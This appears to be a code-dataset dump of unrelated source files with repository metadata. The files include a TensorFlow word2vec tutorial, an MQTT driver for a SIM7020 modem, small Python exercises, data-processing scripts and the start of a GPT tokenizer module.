return '{}/{} - {}'.format(self.id, self.post_id.title, self.user_id.id)
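# Hypothetical usage sketch (assumes migrations are applied and at least one
# User and one Post row exist); shown as comments because it needs a
# configured Django environment to run:
#
#   user = User.objects.first()
#   post = Post.objects.first()
#   c = Comment.objects.create(user_id=user, post_id=post, content="Nice post!")
#   print(c)   # e.g. "1/<post title> - <user id>" via __str__ above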
|
[
"nhucsau1995@gmail.com"
] |
nhucsau1995@gmail.com
|
abf7eb515ae21d5ef3f410269569113c07252f57
|
22b3e3b9d5137575f4a9c8b70703ffaecfe9a5a8
|
/gauss1.py
|
34384098fbae7656a4f61a8bb77a8c6f8855db6d
|
[] |
no_license
|
abdcelikkanat/expemb
|
d2cee75fa5b533a294a3da2349cef326c627fc2e
|
e5180e9bceceba507cf4d6438541ea6d6ca541ab
|
refs/heads/master
| 2020-03-22T09:58:20.236304
| 2018-07-18T15:53:14
| 2018-07-18T15:53:14
| 139,872,581
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,350
|
py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Basic word2vec example."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import math
import os
import sys
import argparse
import random
from tempfile import gettempdir
import zipfile
import numpy as np
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
from tensorflow.contrib.tensorboard.plugins import projector
# Give a folder path as an argument with '--log_dir' to save
# TensorBoard summaries. Default is a log folder in current directory.
current_path = os.path.dirname(os.path.realpath(sys.argv[0]))
parser = argparse.ArgumentParser()
parser.add_argument(
'--log_dir',
type=str,
default=os.path.join(current_path, 'log'),
help='The log directory for TensorBoard summaries.')
FLAGS, unparsed = parser.parse_known_args()
# Create the directory for TensorBoard variables if there is not.
if not os.path.exists(FLAGS.log_dir):
os.makedirs(FLAGS.log_dir)
# Step 1: Download the data.
url = 'http://mattmahoney.net/dc/'
# pylint: disable=redefined-outer-name
def maybe_download(filename, expected_bytes):
"""Download a file if not present, and make sure it's the right size."""
local_filename = os.path.join(gettempdir(), filename)
if not os.path.exists(local_filename):
local_filename, _ = urllib.request.urlretrieve(url + filename, local_filename)
statinfo = os.stat(local_filename)
if statinfo.st_size == expected_bytes:
print('Found and verified', filename)
else:
print(statinfo.st_size)
raise Exception('Failed to verify ' + local_filename + ' Can you get to it with a browser?')
return local_filename
filename = maybe_download('text8.zip', 31344016)
# Read the data into a list of strings.
def read_data(filename):
"""Extract the first file enclosed in a zip file as a list of words."""
with zipfile.ZipFile(filename) as f:
data = tf.compat.as_str(f.read(f.namelist()[0])).split()
return data
vocabulary = read_data(filename)
print('Data size', len(vocabulary))
# Step 2: Build the dictionary and replace rare words with UNK token.
vocabulary_size = 50000
def build_dataset(words, n_words):
"""Process raw inputs into a dataset."""
count = [['UNK', -1]] # unknown word
count.extend(collections.Counter(words).most_common(n_words - 1)) # get the most common words
dictionary = dict()
for word, _ in count:
dictionary[word] = len(dictionary) # label each word with a number
data = list()
unk_count = 0
for word in words:
index = dictionary.get(word, 0)
if index == 0: # dictionary['UNK']
unk_count += 1
data.append(index)
count[0][1] = unk_count
reversed_dictionary = dict(zip(dictionary.values(), dictionary.keys()))
return data, count, dictionary, reversed_dictionary
# Filling 4 global variables:
# data - list of codes (integers from 0 to vocabulary_size-1).
# This is the original text but words are replaced by their codes
# count - map of words(strings) to count of occurrences
# dictionary - map of words(strings) to their codes(integers)
# reverse_dictionary - maps codes(integers) to words(strings)
data, count, dictionary, reverse_dictionary = build_dataset(vocabulary, vocabulary_size)
del vocabulary # Hint to reduce memory.
print('Most common words (+UNK)', count[:5])
print('Sample data', data[:10], [reverse_dictionary[i] for i in data[:10]])
data_index = 0
# Step 3: Function to generate a training batch for the skip-gram model.
def generate_batch(batch_size, num_skips, skip_window):
global data_index
assert batch_size % num_skips == 0
assert num_skips <= 2 * skip_window
batch = np.ndarray(shape=(batch_size), dtype=np.int32)
labels = np.ndarray(shape=(batch_size, 1), dtype=np.int32)
span = 2 * skip_window + 1 # [ skip_window target skip_window ]
buffer = collections.deque(maxlen=span) # pylint: disable=redefined-builtin
if data_index + span > len(data):
data_index = 0
buffer.extend(data[data_index:data_index + span])
data_index += span
for i in range(batch_size // num_skips):
context_words = [w for w in range(span) if w != skip_window]
words_to_use = random.sample(context_words, num_skips)
for j, context_word in enumerate(words_to_use):
batch[i * num_skips + j] = buffer[skip_window]
labels[i * num_skips + j, 0] = buffer[context_word]
if data_index == len(data):
buffer.extend(data[0:span])
data_index = span
else:
buffer.append(data[data_index])
data_index += 1
# Backtrack a little bit to avoid skipping words in the end of a batch
data_index = (data_index + len(data) - span) % len(data)
return batch, labels
batch, labels = generate_batch(batch_size=8, num_skips=2, skip_window=1)
for i in range(8):
print(batch[i], reverse_dictionary[batch[i]], '->', labels[i, 0], reverse_dictionary[labels[i, 0]])
# Step 4: Build and train a skip-gram model.
batch_size = 128
embedding_size = 128 # Dimension of the embedding vector.
skip_window = 1 # How many words to consider left and right.
num_skips = 2 # How many times to reuse an input to generate a label.
num_sampled = 64 # Number of negative examples to sample.
# We pick a random validation set to sample nearest neighbors. Here we limit the
# validation samples to the words that have a low numeric ID, which by
# construction are also the most frequent. These 3 variables are used only for
# displaying model accuracy, they don't affect calculation.
valid_size = 16 # Random set of words to evaluate similarity on.
valid_window = 100 # Only pick dev samples in the head of the distribution.
valid_examples = np.random.choice(valid_window, valid_size, replace=False)
graph = tf.Graph()
with graph.as_default():
# Input data.
with tf.name_scope('inputs'):
train_inputs = tf.placeholder(tf.int32, shape=[batch_size])
train_labels = tf.placeholder(tf.int32, shape=[batch_size, 1])
valid_dataset = tf.constant(valid_examples, dtype=tf.int32)
# Ops and variables pinned to the CPU because of missing GPU implementation
with tf.device('/cpu:0'):
# Look up embeddings for inputs.
with tf.name_scope('embeddings'):
embeddings = tf.Variable(
tf.random_uniform([vocabulary_size, embedding_size], -1.0, 1.0))
embed = tf.nn.embedding_lookup(embeddings, train_inputs)
# Construct the variables for the NCE loss
with tf.name_scope('weights'):
nce_weights = tf.Variable(
tf.truncated_normal(
[vocabulary_size, embedding_size],
stddev=1.0 / math.sqrt(embedding_size)))
with tf.name_scope('biases'):
nce_biases = tf.Variable(tf.zeros([vocabulary_size]))
# Compute the average NCE loss for the batch.
# tf.nce_loss automatically draws a new sample of the negative labels each
# time we evaluate the loss.
# Explanation of the meaning of NCE loss:
# http://mccormickml.com/2016/04/19/word2vec-tutorial-the-skip-gram-model/
with tf.name_scope('loss'):
loss = tf.reduce_mean(
tf.nn.nce_loss(
weights=nce_weights,
biases=nce_biases,
labels=train_labels,
inputs=embed,
num_sampled=num_sampled,
num_classes=vocabulary_size))
# Add the loss value as a scalar to summary.
tf.summary.scalar('loss', loss)
# Construct the SGD optimizer using a learning rate of 1.0.
with tf.name_scope('optimizer'):
optimizer = tf.train.GradientDescentOptimizer(1.0).minimize(loss)
# Compute the cosine similarity between minibatch examples and all embeddings.
norm = tf.sqrt(tf.reduce_sum(tf.square(embeddings), 1, keep_dims=True))
normalized_embeddings = embeddings / norm
valid_embeddings = tf.nn.embedding_lookup(normalized_embeddings, valid_dataset)
similarity = tf.matmul(valid_embeddings, normalized_embeddings, transpose_b=True)
# Merge all summaries.
merged = tf.summary.merge_all()
# Add variable initializer.
init = tf.global_variables_initializer()
# Create a saver.
saver = tf.train.Saver()
# Step 5: Begin training.
num_steps = 100001
with tf.Session(graph=graph) as session:
# Open a writer to write summaries.
writer = tf.summary.FileWriter(FLAGS.log_dir, session.graph)
# We must initialize all variables before we use them.
init.run()
print('Initialized')
average_loss = 0
for step in xrange(num_steps):
batch_inputs, batch_labels = generate_batch(batch_size, num_skips,
skip_window)
feed_dict = {train_inputs: batch_inputs, train_labels: batch_labels}
# Define metadata variable.
run_metadata = tf.RunMetadata()
# We perform one update step by evaluating the optimizer op (including it
# in the list of returned values for session.run()
# Also, evaluate the merged op to get all summaries from the returned "summary" variable.
# Feed metadata variable to session for visualizing the graph in TensorBoard.
_, summary, loss_val = session.run(
[optimizer, merged, loss],
feed_dict=feed_dict,
run_metadata=run_metadata)
average_loss += loss_val
# Add returned summaries to writer in each step.
writer.add_summary(summary, step)
# Add metadata to visualize the graph for the last run.
if step == (num_steps - 1):
writer.add_run_metadata(run_metadata, 'step%d' % step)
if step % 2000 == 0:
if step > 0:
average_loss /= 2000
# The average loss is an estimate of the loss over the last 2000 batches.
print('Average loss at step ', step, ': ', average_loss)
average_loss = 0
# Note that this is expensive (~20% slowdown if computed every 500 steps)
if step % 10000 == 0:
sim = similarity.eval()
for i in xrange(valid_size):
valid_word = reverse_dictionary[valid_examples[i]]
top_k = 8 # number of nearest neighbors
nearest = (-sim[i, :]).argsort()[1:top_k + 1]
log_str = 'Nearest to %s:' % valid_word
for k in xrange(top_k):
close_word = reverse_dictionary[nearest[k]]
log_str = '%s %s,' % (log_str, close_word)
print(log_str)
final_embeddings = normalized_embeddings.eval()
# Write corresponding labels for the embeddings.
with open(FLAGS.log_dir + '/metadata.tsv', 'w') as f:
for i in xrange(vocabulary_size):
f.write(reverse_dictionary[i] + '\n')
# Save the model for checkpoints.
saver.save(session, os.path.join(FLAGS.log_dir, 'model.ckpt'))
# Create a configuration for visualizing embeddings with the labels in TensorBoard.
config = projector.ProjectorConfig()
embedding_conf = config.embeddings.add()
embedding_conf.tensor_name = embeddings.name
embedding_conf.metadata_path = os.path.join(FLAGS.log_dir, 'metadata.tsv')
projector.visualize_embeddings(writer, config)
writer.close()
# Step 6: Visualize the embeddings.
# pylint: disable=missing-docstring
# Function to draw visualization of distance between embeddings.
def plot_with_labels(low_dim_embs, labels, filename):
assert low_dim_embs.shape[0] >= len(labels), 'More labels than embeddings'
plt.figure(figsize=(18, 18)) # in inches
for i, label in enumerate(labels):
x, y = low_dim_embs[i, :]
plt.scatter(x, y)
plt.annotate(
label,
xy=(x, y),
xytext=(5, 2),
textcoords='offset points',
ha='right',
va='bottom')
plt.savefig(filename)
try:
# pylint: disable=g-import-not-at-top
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
tsne = TSNE(perplexity=30, n_components=2, init='pca', n_iter=5000, method='exact')
plot_only = 500
low_dim_embs = tsne.fit_transform(final_embeddings[:plot_only, :])
labels = [reverse_dictionary[i] for i in xrange(plot_only)]
plot_with_labels(low_dim_embs, labels, os.path.join(gettempdir(), 'tsne.png'))
except ImportError as ex:
print('Please install sklearn, matplotlib, and scipy to show embeddings.')
print(ex)
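# A tiny, dependency-free sketch (toy tokens, not the text8 corpus) of the
# (target -> context) pairs generate_batch() emits with skip_window=1 and
# num_skips=2: every interior word predicts both of its immediate neighbours.
toy = ["the", "quick", "brown", "fox"]
pairs = []
for i in range(1, len(toy) - 1):      # positions with a full 1-word window
    for j in (i - 1, i + 1):          # both neighbours
        pairs.append((toy[i], toy[j]))
print(pairs)
# [('quick', 'the'), ('quick', 'brown'), ('brown', 'quick'), ('brown', 'fox')]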
|
[
"abdcelikkanat@gmail.com"
] |
abdcelikkanat@gmail.com
|
dab5a55c04a4f4242ed5725c95704470f8d27791
|
aa30891b324f86fe9c6a3eeeb6a9b8ae64b7d81d
|
/ex043.py
|
3f7ab5d16e10be268d9e4f0765ca04086af2ad88
|
[] |
no_license
|
JoamirS/Exercicios-Python
|
0055c5f73b9d0fb2d5d780c620bb0c4840c7d1b8
|
09b74babdfdf7142254a8d14132859e52f7b52b6
|
refs/heads/master
| 2023-08-31T13:21:03.310332
| 2023-08-26T03:42:58
| 2023-08-26T03:42:58
| 178,745,611
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 874
|
py
|
'''
Write a program that reads a person's weight and height, computes their BMI (IMC)
and prints the matching status, according to the table below:
- Below 18.5: Underweight | - Between 18.5 and 25: Ideal weight | 25 to 30: Overweight | 30 to 40: Obesity
- Above 40: Morbid obesity
'''
# Declare the variables
print('\033[31mExemplo: KG 70\033[0;0m')
weight = float(input('Digite seu peso: KG '))
print('\033[31mExemplo: M 1.85\033[0;0m')
height = float(input('Digite sua altura: M '))
imc = weight / (height ** 2)
print('O IMC desta pessoa é {:.1f}'.format(imc))
# Declare the conditions
if imc < 18.5:
print('Você está abaixo do peso')
elif 18.5 <= imc < 25:
print('Você está na faixa de peso ideal')
elif 25 <= imc < 30:
print('Sobrepeso')
elif 30 <= imc < 40:
print('Obesidade')
elif imc >= 40:
print('Obesidade Mórbida')
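# The same BMI table wrapped in a reusable function -- a sketch, not part of
# the original exercise; thresholds mirror the if/elif chain above.
def imc_status(weight_kg, height_m):
    imc = weight_kg / height_m ** 2
    if imc < 18.5:
        return "Underweight"
    elif imc < 25:
        return "Ideal weight"
    elif imc < 30:
        return "Overweight"
    elif imc < 40:
        return "Obesity"
    return "Morbid obesity"

print(imc_status(70, 1.85))  # "Ideal weight" (IMC ~ 20.5)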
|
[
"jmrsilveira@outlook.com"
] |
jmrsilveira@outlook.com
|
59a142c83b55cf70c1b11cd1a379207fea009324
|
3e97071e538e9a08d104b6937079ad2e87049028
|
/GCAT_2_1_run_analysis.py
|
760ae48f9c04298815635b92c26733b1b1306ed3
|
[] |
no_license
|
cuelee/regen
|
4f26fba4fbb5f224d4f758b80bb8ff742909ce14
|
dce9790b48c0228f4abb602b6b231908665a6ddb
|
refs/heads/master
| 2020-03-21T22:15:28.880119
| 2018-07-11T10:46:41
| 2018-07-11T10:46:41
| 139,114,849
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,361
|
py
|
######################
## Created by Cue Hyunkyu Lee
## Date Jan 17 2018
##
## import modules
import sys
import os
## Read input arguments
print("The current code is: {}".format(sys.argv[0]));
print("The number of arguments is: {}".format(len(sys.argv)));
snp_file = sys.argv[1];
catalog_dir = os.path.dirname(snp_file);
out_file = os.path.join(catalog_dir,"catalogIn1000G.txt");
tg_file = sys.argv[2];
## Read GWAS catalog snp file
print("\nStart reading snp file")
catalog_snps = [];
n = 0;
with open(snp_file,"r") as fin:
for line in fin:
splitted = line.strip();
catalog_snps.append(splitted);
n = n + 1;
print("The total number of lines: {}".format(n));
print("\nComplete reading snp file");
## set indices
catalog_dict = dict((j,i) for (i,j) in enumerate(catalog_snps));
found_vec = [False] * len(catalog_snps);
## Read TG (1000 Genomes) data
print("\nStart reading tg data");
n = 0;
with open(tg_file,"r") as fin, open(out_file,"w") as fout:
for line in fin:
splitted = line.strip().split("\t");
cur_snp=splitted[1];
if ( cur_snp in catalog_dict ):
print(" ".join(map(str,splitted)),file=fout);
found_vec[catalog_dict[cur_snp]] = True;
n = n + 1;
print("The total number of founds: {}".format(n));
print("\nComplete reading TG_data");
n=0;
for i in range(len(found_vec)):
if(found_vec[i] == False):
n=n+1;
print("n = {}".format(n))
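# Standalone sketch of the lookup pattern this script relies on: build a
# value->index dict once so each membership test and position lookup is O(1)
# instead of a linear scan. The SNP ids below are made up.
catalog_snps = ["rs1", "rs7", "rs42"]
catalog_dict = dict((j, i) for (i, j) in enumerate(catalog_snps))
found_vec = [False] * len(catalog_snps)
for cur_snp in ["rs7", "rs99"]:
    if cur_snp in catalog_dict:
        found_vec[catalog_dict[cur_snp]] = True
print(found_vec)  # [False, True, False]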
|
[
"cue.h.lee@gmail.com"
] |
cue.h.lee@gmail.com
|
32feabe5a60e6f5718692006002449e8ee5150a2
|
14825fa733275154b41452fcdb7d4a35ec897495
|
/sim7020/sim7020_mqtt.py
|
1ab17a41aa10bf44d3ece3c40f10b4209fbc81db
|
[
"MIT"
] |
permissive
|
tedchiu/am7020_raspberry
|
7865834000dbff920937a967facd797f4cd29d41
|
8b4acddb66ad056102a626cc6a5300ad98e43f0d
|
refs/heads/main
| 2023-01-10T07:48:46.212758
| 2020-11-16T06:02:22
| 2020-11-16T06:02:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,687
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# sim7020_mqtt.py
# @Author : Zack Huang ()
# @Link : zack@atticedu.com
# @Date : 2020/11/7 4:12:24 PM
from random import randint
from time import time, sleep
from typing import Dict
CONN_BROKER_TIMEOUT_S = 90  # seconds; the original name ended in _MS, but the value is used as seconds
NUM_OF_SUB = 30
class SIM7020MQTT():
def __init__(self, nb):
self.sub_list = []
self.nb = nb
def newMQTT(self, server, port):
# New MQTT. refer AT CMD 11.2.1
self.nb.sendAT("+CMQNEW=\"", server, "\",", port, ",30000,1132")
if((self.nb.waitResponse(30, "+CMQNEW: 0") == 1) and (self.nb.waitResponse() == 1)):
return True
return False
def chkMQTTChOpen(self):
# New MQTT. refer AT CMD 11.2.1
self.nb.sendAT("+CMQNEW?")
if(self.nb.waitResponse(10, "+CMQNEW: 0,") == 1):
used_state = self.nb.streamGetIntBefore(',')
self.nb.streamSkipUntil('\n')
self.nb.waitResponse()
return (used_state == 1)
return False
def connMQTT(self, mqtt_id, username, password, cleansession):
# Send MQTT Connection Packet. refer AT CMD 11.2.2
self.nb.sendAT("+CMQCON=0,4,\"", mqtt_id, "\",20000,", int(cleansession), ",0,\"",
username, "\",\"", password, "\"")
return (self.nb.waitResponse(30) == 1)
def chkMQTTChConn(self):
# Send MQTT Connection Packet. refer AT CMD 11.2.2
self.nb.sendAT("+CMQCON?")
if(self.nb.waitResponse(10, "+CMQCON: 0,") == 1):
conn_state = self.nb.streamGetIntBefore(',')
self.nb.waitResponse()
return (conn_state == 1)
return False
def closeMQTTCh(self):
# Disconnect MQTT. refer AT CMD 11.2.3
self.nb.sendAT("+CMQDISCON=0")
return (self.nb.waitResponse(2) == 1)
def setSyncMode(self, value):
# Configure MQTT Synchronization Mode. refer AT CMD 11.2.14
self.nb.sendAT("+CMQTSYNC=", value)
return (self.nb.waitResponse(2) == 1)
def connBroker(self, server, port=1883, username="", password="", mqtt_id="", cleansession=True):
        # Note: the link is dropped automatically once keepalive_interval elapses.
temp_mqtt_id = ""
if(mqtt_id == ""):
temp_mqtt_id = "sim7020_mqttid_" + str(randint(0, 65535))
else:
temp_mqtt_id = mqtt_id
        startTime = time() + CONN_BROKER_TIMEOUT_S
while(time() < startTime):
if(not self.chkMQTTChOpen()):
# Delay is used here because the SIM7020 module has a bug.
sleep(1)
self.closeMQTTCh()
if(self.setSyncMode(1)):
self.newMQTT(server, port)
continue
else:
if(not self.chkMQTTChConn()):
self.connMQTT(temp_mqtt_id, username,
password, cleansession)
continue
return True
return False
def chkConnBroker(self):
return self.chkMQTTChConn()
def publish(self, topic, msg, qos=0):
# Send MQTT Publish Packet. refer AT CMD 11.2.6
self.nb.sendAT("+CMQPUB=0,\"", topic, "\",", qos,
",0,0,", len(str(msg)), ",\"", str(msg), "\"")
return (self.nb.waitResponse(10) == 1)
def subscribe(self, topic, callback, qos=0):
if(len(self.sub_list) <= NUM_OF_SUB):
# Send MQTT Subscribe Packet. refer AT CMD 11.2.4
self.nb.sendAT("+CMQSUB=0,\"", topic, "\",", qos)
self.nb.waitResponse(10)
temp_sub = (topic, callback)
self.sub_list.append(temp_sub)
            # Note: this library enables MQTT Synchronization Mode; any subscription is treated as successful as long as the subscription count stays within the configured limit (NUM_OF_SUB).
return True
else:
print("Subscription limit exceeded !")
return False
def unSubscribe(self, topic):
# Send MQTT Unsubscribe Packet. refer AT CMD 11.2.5
self.nb.sendAT("+CMQUNSUB=0,\"", topic, "\"")
return (self.nb.waitResponse(10) == 1)
def procSubs(self):
if(self.nb.waitResponse(0.01, "+CMQPUB: ") == 1):
self.ParseSubMsg()
def ParseSubMsg(self):
if(self.nb.streamSkipUntil(',')):
topic = self.nb.streamGetStringBefore(',')[1:-1]
if(self.nb.streamSkipUntil('\"')):
msg = self.nb.streamGetStringBefore('\n')[:-2]
for sub in self.sub_list:
if(sub[0] == topic):
sub[1](msg)
return
print("not find topic")
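# Hypothetical usage sketch: "nb" stands for the AT-command transport object
# this class expects (something exposing sendAT/waitResponse/stream* methods),
# and the broker host and topic are placeholders; shown as comments because it
# cannot run without the modem hardware:
#
#   mqtt = SIM7020MQTT(nb)
#   if mqtt.connBroker("test.mosquitto.org", 1883):
#       mqtt.subscribe("demo/topic", lambda msg: print("got:", msg))
#       mqtt.publish("demo/topic", "hello")
#       while True:
#           mqtt.procSubs()   # poll for inbound publishes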
|
[
"zack@atticedu.com"
] |
zack@atticedu.com
|
26d720a549d070b0a29ae849b5a1da4a78b33e17
|
6996d66c2e5438af8e9ab534a168387ec437f846
|
/ch3/queue.py
|
b0a4001b44950011ce3aa037799e2e3aef18b44c
|
[] |
no_license
|
ziwenjie/datastructuer-in-python
|
f7d69ba69fb3ddbfba4c1d113ed8dcbd23f4c788
|
eb044c04376681bb0d67456fe7d200c39af7ceea
|
refs/heads/master
| 2022-12-03T13:52:46.427379
| 2020-08-27T08:10:17
| 2020-08-27T08:10:17
| 290,450,350
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 96
|
py
|
from pythonds.basic.queue import Queue
q = Queue()
print(q.isEmpty())
q.enqueue('dog')
print(q)
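# A minimal list-backed equivalent of the pythonds Queue interface used above,
# for when the package is unavailable -- a sketch following the book's
# convention of enqueueing at the front and dequeueing from the rear.
class SimpleQueue:
    def __init__(self):
        self.items = []
    def isEmpty(self):
        return self.items == []
    def enqueue(self, item):
        self.items.insert(0, item)
    def dequeue(self):
        return self.items.pop()
    def size(self):
        return len(self.items)

sq = SimpleQueue()
sq.enqueue('dog')
print(sq.isEmpty(), sq.dequeue())  # False dog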
|
[
"noreply@github.com"
] |
ziwenjie.noreply@github.com
|
3f225b2ed128a5ca734a39185b73e70d25f1f414
|
ecd04e18c0bc7e690e81274a401602458becf9e5
|
/scripts/test.py
|
8442a76b9b62d776df40924ec2c0efee441f0f23
|
[] |
no_license
|
abner0908/cloud_robot
|
c7b69249af672e0c68ca7927e66aaaedd7e42047
|
98e2f7b9fbce6008bd82bfcbeed1aad7f22ff830
|
refs/heads/master
| 2016-08-12T08:28:13.239680
| 2016-05-04T07:06:45
| 2016-05-04T07:06:45
| 47,419,829
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,564
|
py
|
from common import clock
class FPS:
def __init__(self):
# store the start time, end time, and total number of frames
# that were examined between the start and end intervals
self._start = None
self._end = None
self._numFrames = 0
self._window_size = 120
def __str__(self):
self.stop()
return str(self.fps())
def __float__(self):
self.stop()
return self.fps()
def start(self):
# start the timer
self._start = clock()
return self
def stop(self):
# stop the timer
self._end = clock()
def update(self):
# increment the total number of frames examined during the
# start and end intervals
self._numFrames += 1
if self._numFrames == self._window_size * 2:
            # drop the oldest window of frames; the original hard-coded 120,
            # which silently breaks if _window_size is changed
            self._numFrames -= self._window_size
self._start = self._window_start
if self._numFrames == self._window_size:
self._window_start = clock()
def elapsed(self):
# return the total number of seconds between the start and
# end interval
        if self._start is None or self._end is None:
            raise Exception(
                "start() and stop() must be called before reading the fps value.")
return (self._end - self._start)
def fps(self):
# compute the (approximate) frames per second
return self._numFrames / self.elapsed()
if __name__ == "__main__":
    fps = FPS().start()
    fps.update()
    print(fps)
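# Hypothetical usage sketch for timing a real processing loop; do_frame_work
# is a placeholder, and clock comes from the project's "common" module:
#
#   fps = FPS().start()
#   for _ in range(1000):
#       do_frame_work()     # per-frame processing goes here
#       fps.update()
#   fps.stop()
#   print("approx fps:", fps.fps())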
|
[
"abner0908@gmail.com"
] |
abner0908@gmail.com
|
a0632e225303452902c28c5c8052bdbbf59f3fea
|
7fc11cb1ac572e46caa5d3a197ce7052d9ca0d59
|
/check_process/add_new_contrib.py
|
c3664509be50c22c61625d59db72dd29c015d78b
|
[
"Apache-2.0"
] |
permissive
|
agrogeophy/catalog
|
247ed10f6c4b256e4de296f121594a8150aef7f1
|
fcac33e4404436927fe92f03c9166e7ec459677a
|
refs/heads/master
| 2023-04-07T21:09:10.705642
| 2022-03-15T17:51:24
| 2022-03-15T17:51:24
| 292,792,330
| 2
| 3
| null | 2021-01-12T09:54:06
| 2020-09-04T08:22:53
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 3,901
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 26 18:31:14 2021
@author: Benjamin
"""
import sys
import pandas as pd
import json
import datetime
from datetime import date
import argparse
# import eml_parser
# import email
# from email import policy
# from email.parser import BytesParser
import rich.console
import rich.highlighter
import rich.pretty
DEFAULT_DB = '../db.csv'
parser = argparse.ArgumentParser(description='Process new contribution')
parser.add_argument('-csv', type=str, help='csv')
parser.add_argument('-raw', type=str, help='raw csv')
parser.add_argument('-eml_file', type=str, help='eml new contribution filename')
parser.add_argument('-db', type=str, help='db filename', default=DEFAULT_DB)
args = parser.parse_args()
def make_console(verbose):
"""
Start up the :class:`rich.console.Console` instance we'll use.
Parameters
----------
verbose : bool
Whether or not to print status messages to stderr.
"""
return rich.console.Console(stderr=True, quiet=not verbose, highlight=False)
def main():
verbose = True
console = make_console(verbose)
style = "bold blue"
try:
process(verbose, console, style)
except Exception:
style = "bold red"
console.print()
console.rule(":fire: Error messages start here :fire:", style=style)
console.print_exception()
console.rule(":fire: Error messages above :fire:", style=style)
console.print()
def process(verbose, console, style, **kwargs):
csv = args.csv
db_name = args.db
db = pd.read_csv(db_name)
console.print('db before update', style=style)
console.print(db[-3:])
console.print('save a backup with date flag', style=style)
today = date.today()
console.print("Today's date:", today, style=style)
db.to_csv('../backup/' +'db_backup' + str(today) +'.csv',sep=',')
#%% read new contribution
new = pd.read_csv(csv)
print(new['id'][0], new['surname'][0], new['name'][0])
check_values(new,console,style)
check_duplicate(db,new,console,style)
add_to_db(db,new,db_name,console,style)
def check_values(new,console,style):
console.print('checking value types', style=style)
email_ck = '@'
lat_long = 'float'
contribution_type = 'Peer reviewed publication'
publication_date_ck = datetime.date
new_dict = new.to_dict()
    # the original test was inverted (it exited on genuine date objects) and,
    # since CSV fields load as strings, it never fired; parse the field
    # instead -- pandas accepts most common date formats
    try:
        pd.to_datetime(new_dict['publication_date'][0])
    except (ValueError, TypeError):
console.print('publication_date not correct', style='bold red')
sys.exit()
if '@' not in new_dict['email'][0]:
console.print('email not correct', new_dict['email'][0], style='bold red')
sys.exit()
def check_duplicate(db,new,console,style):
console.print('checking duplicates', style=style)
unique_keys_check = ['publication_link','latitude']
db_dict = db.to_dict()
new_dict = new.to_dict()
pub_link = db['publication_link'].tolist()
if new_dict['publication_link'][0] in pub_link:
console.print('simililar DOI', style='bold red')
sys.exit()
def add_to_db(db,new,db_name,console,style):
new['id']=db['id'].max()+1
db = db.append(new)
console.print('db after update', style=style)
console.print(db[-3:])
db.to_csv(db_name,sep=',',index=False)
today = date.today()
name_backup = new['surname'][0] + new['name'][0] + str(today) + '.csv'
new.to_csv('../backup/'+ str(name_backup),sep=',',index=False)
def eml_parser():
    '''
    Parse directly from eml file
    '''
    # imported locally because the module-level email imports are commented out
    from email import policy
    from email.parser import BytesParser
    eml_file_new_contrib = args.eml_file
with open(eml_file_new_contrib, 'rb') as fp: # select a specific email file from the list
name = fp.name # Get file name
msg = BytesParser(policy=policy.default).parse(fp)
text = msg.get_content()
fp.close()
print(text)
if __name__ == '__main__':
main()
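# Standalone sketch of the duplicate check in check_duplicate(): simple
# membership of the new DOI in the existing column. The data is illustrative.
import pandas as pd

db_demo = pd.DataFrame({"publication_link": ["doi:10.1/a", "doi:10.1/b"]})
new_link = "doi:10.1/a"
print(new_link in db_demo["publication_link"].tolist())  # True -> reject as duplicate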
|
[
"36472081+BenjMy@users.noreply.github.com"
] |
36472081+BenjMy@users.noreply.github.com
|
defc0969405d537025d9bf7bd5b186bcd14100b8
|
c6456a52afd45432368f25350017f3821a63f0c9
|
/hw2/part2/pytorch_pretrained_bert/tokenization_openai.py
|
605566c013f1f58d5b682401b22c8a332c47d1fe
|
[] |
no_license
|
haoen0116/Applied-Deep-Learning-HW
|
cd44d64c72c6964407dc1a7d559ae582eb50e4c6
|
b315dce215a008a435b71e44761f468536fb6e4e
|
refs/heads/master
| 2022-11-18T14:48:04.031224
| 2019-09-09T07:21:51
| 2019-09-09T07:21:51
| 207,227,238
| 0
| 1
| null | 2022-10-30T07:23:18
| 2019-09-09T04:58:15
|
Python
|
UTF-8
|
Python
| false
| false
| 13,592
|
py
|
# coding=utf-8
# Copyright 2018 The Open AI Team Authors and The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenization classes for OpenAI GPT."""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
import logging
import os
import re
import sys
from io import open
from tqdm import tqdm
from .file_utils import cached_path
from .tokenization import BasicTokenizer
logger = logging.getLogger(__name__)
PRETRAINED_VOCAB_ARCHIVE_MAP = {
'openai-gpt': "https://s3.amazonaws.com/models.huggingface.co/bert/openai-gpt-vocab.json",
}
PRETRAINED_MERGES_ARCHIVE_MAP = {
'openai-gpt': "https://s3.amazonaws.com/models.huggingface.co/bert/openai-gpt-merges.txt",
}
PRETRAINED_VOCAB_POSITIONAL_EMBEDDINGS_SIZE_MAP = {
'openai-gpt': 512,
}
